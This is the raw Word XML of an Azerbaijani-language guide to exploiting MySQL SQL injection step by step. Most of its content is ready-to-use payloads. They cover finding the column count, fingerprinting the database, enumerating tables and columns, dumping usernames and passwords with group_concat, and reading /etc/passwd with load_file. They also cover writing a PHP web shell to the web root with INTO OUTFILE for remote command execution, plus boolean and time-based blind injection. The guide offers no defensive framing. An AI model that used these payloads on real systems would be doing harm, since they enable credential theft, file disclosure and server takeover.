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2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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r w:rsidRPr="00EE2B0B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M</w:t>
      </w:r>
      <w:r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ySQL SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Bu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sənəddə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MySQL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verilənlər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bazası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üzərində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qurulmuş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zəif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tətbiqlərdə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SQL Injection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boşluğunu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mərhələli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şəkildə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istismar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etmək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üçün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istifadə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olunan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payloadlar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ardıcıllıqla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göstərilmişdir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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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1: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Sütun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Sayının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Təyin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Edilməsi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(Column Count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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UNION</w:t>
      </w:r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-based injection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etmək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üçün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orijinal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sorğunun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neçə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sütun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qaytardığını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mütləq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bilməliyik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Əgər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sütun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sayı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uyğun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gəlməsə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MySQL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xəta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verəcək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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Sütun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sayını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tapmaq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üçün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iki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metod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mövcuddur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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Metod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A: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B0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ORDER BY</w:t>
      </w:r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ilə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Tövsiyə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olunan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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Xəta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alana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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qədər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rəqəmi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artırırıq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Əgər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5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yazdıqda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xəta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verirsə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deməli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cədvəldə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4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sütun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var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' ORDER</w:t>
      </w:r>
      <w:proofErr w:type="gram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BY 1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' ORDER</w:t>
      </w:r>
      <w:proofErr w:type="gram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BY 2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' ORDER</w:t>
      </w:r>
      <w:proofErr w:type="gram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BY 3 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' ORDER</w:t>
      </w:r>
      <w:proofErr w:type="gram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BY 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Qeyd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B0B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</w:rPr>
        <w:t>--</w:t>
      </w:r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işarəsindən</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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sonra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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mütləq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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boşluq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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buraxılmalıdır</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Metod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B: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B0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UNION SELECT</w:t>
      </w:r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ilə</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Rəqəmlərin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sayını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artıraraq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xətanın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itməsini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gözləyirik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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1,2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1,2,3 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1,2,3,4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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2: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Verilənlər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Bazası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Haqqında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Məlumat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Toplama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(Fingerprinting)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Tutaq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ki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yoxlamalar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nəticəsində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cədvəlin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4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sütundan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ibarət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olduğunu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təyin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etdik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İndi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hansı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sütunların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ekranda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göründüyünü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yoxlamaq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və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baza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haqqında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kritik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məlumatları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çəkmək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lazımdır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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Sistem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istifadəçisini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və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verilənlər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bazasının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adını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öyrənmək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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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' UNION SELECT 1, user(), database(), 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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 xml:space="preserve">MySQL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versiyasını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öyrənmək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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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' UNION SELECT 1, @@version, version(), 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Bazanın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yerləşdiyi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qovluğu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və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əməliyyat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sistemini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öyrənmək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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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' UNION SELECT 1, @@</w:t>
      </w:r>
      <w:proofErr w:type="spell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basedir</w:t>
      </w:r>
      <w:proofErr w:type="spell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, @@</w:t>
      </w:r>
      <w:proofErr w:type="spell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datadir</w:t>
      </w:r>
      <w:proofErr w:type="spell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, 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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3: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Cədvəl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Adlarının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Çıxarılması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(Table Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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MySQL-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də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bütün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verilənlər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bazalarının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cədvəllərin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və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sütunların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strukturu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information_schema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adlı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xüsusi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bir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sistem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bazasında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saxlanılır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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Cari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verilənlər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bazasındakı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gram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database(</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r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bütün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cədvəllərin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siyahısını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çıxarmaq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üçün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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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, 3, 4 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spell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WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spell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=database() -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Əgər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bütün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bazalardakı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cədvəlləri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görmək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istəyirsinizsə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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spell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, 4 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spell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-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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4: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Sütun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Adlarının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Çıxarılması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(Column Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Tutaq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ki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yuxarıdakı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addımda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hədəf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cədvəlimizin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adının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gram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users</w:t>
      </w:r>
      <w:proofErr w:type="gram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olduğunu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tapdıq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İndi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həmin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cədvəlin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hansı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sütunlardan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məsələn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id, username, password</w:t>
      </w:r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ibarət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olduğunu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öyrənməliyik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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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, 3, 4 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spell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WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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='users' AND </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spell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=database() -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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5: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Məlumatların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Çıxarılması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(Data Extraction)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Cədvəl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adını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users</w:t>
      </w:r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və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sütun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adlarını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username</w:t>
      </w:r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password</w:t>
      </w:r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bildikdən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sonra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bazadakı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bütün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məlumatları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birbaşa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ekrana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tökə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bilərik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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, username, password, 4 FROM users -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Çoxlu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Sətirləri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Birləşdirmək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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE2B0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group_concat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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Əgər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tətbiqin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dizaynı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yalnız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tək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bir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sətir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göstərməyə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icazə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verirsə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bütün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istifadəçi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adlarını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və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şifrləri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tək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bir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sətirdə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birləşdirərək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oxumaq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olar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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spell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(username, ':', password), 3, 4 FROM users -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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(Bu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sorğu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ekrana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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r w:rsidRPr="00EE2B0B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</w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE2B0B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</w:rPr>
        <w:t>:pbkdf2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE2B0B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</w:rPr>
        <w:t>_sha256..., user1:pass123</w:t>
      </w:r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şəklində</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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nəticə</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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çıxaracaq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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6: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Qabaqcıl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MySQL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Texnikaları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(Advanced Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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A.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Sistemdən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Fayl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Oxumaq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</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B0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LOAD_FILE</w:t>
      </w:r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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="188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Əgər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verilənlər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bazası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istifadəçisinin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lazımi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üstünlükləri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(privileges)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varsa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o, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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serverdəki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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lokal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faylları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oxuya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bilər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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gram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' UNION</w:t>
      </w:r>
      <w:proofErr w:type="gram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SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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load_file</w:t>
      </w:r>
      <w:proofErr w:type="spell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('/</w:t>
      </w:r>
      <w:proofErr w:type="spell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etc</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:proofErr w:type="spell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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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'), 3, 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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B.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Serverə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Fayl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Yazmaq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</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B0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INTO OUTFILE</w:t>
      </w:r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-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Webshell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yükləmək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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Əgər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serverin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</w:t>
      </w:r>
      <w:proofErr w:type="spell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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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/www/html/</w:t>
      </w:r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və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ya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digər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web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qovluğu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qovluğuna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yazmaq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icazəsi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varsa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birbaşa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server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daxilində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yeni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bi</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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r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PHP/Python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faylı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yaradaraq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uzaqdan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idarəetmə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(RCE)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əldə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etmək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olar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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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' UNION SELECT 1, '&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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?</w:t>
      </w:r>
      <w:proofErr w:type="spell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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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system($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spell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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spell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"]); ?&gt;', 3, 4 INTO OUTFILE '/</w:t>
      </w:r>
      <w:proofErr w:type="spell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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spell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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spell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' -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Addım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7: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Kor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MySQL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İnyeksiyası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(Blind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SQLi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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Əgər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tətbiq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ekrana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heç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bir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məlumat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çıxarmırsa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lakin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biz SQL-in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işlədiyini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biliriksə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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Boolean-based (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Məntiqi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yoxlama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</w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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' AND </w:t>
      </w:r>
      <w:proofErr w:type="spell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ascii</w:t>
      </w:r>
      <w:proofErr w:type="spell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(substring(version(),1,1))=53 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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(MySQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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versiyasının</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ilk </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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simvolunun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ASCII </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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kodu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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53-ə, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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yəni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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'5' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rəqəminə</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bərabər</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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olub-olmadığını</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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yoxlayır</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE2B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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0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Time-based (Zaman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əsaslı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yoxlama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE2B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</w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE2B0B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Əgər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şərt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doğrudursa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səhifənin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cavab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verməsini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5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saniyə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gecikdirir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE2B0B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EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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proofErr w:type="gramStart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' AND</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE2B0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IF(version() LIKE '8%', sleep(5), 0) -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2B0B" w:rsidRPr="00EE2B0B" w:rsidRDefault="00EE2B0B" w:rsidP="00EE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:rsidR="002626AC" w:rsidRDefault="002626AC"/>
    <w:sectPr w:rsidR="002626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177E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BB6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C91E67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB1A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B0B"/>
    <w:rsid w:val="002626AC"/>
    <w:rsid w:val="00EE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3D3A3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{11EDB79D-29A1-4893-A15E-0F07F7282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2B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E2B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E2B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B0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E2B0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E2B0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E2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E2B0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2B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2B0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E2B0B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00EE2B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81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598</Words>
  <Characters>3412</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>28</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Murad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Murad</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-16T18:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-16T18:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>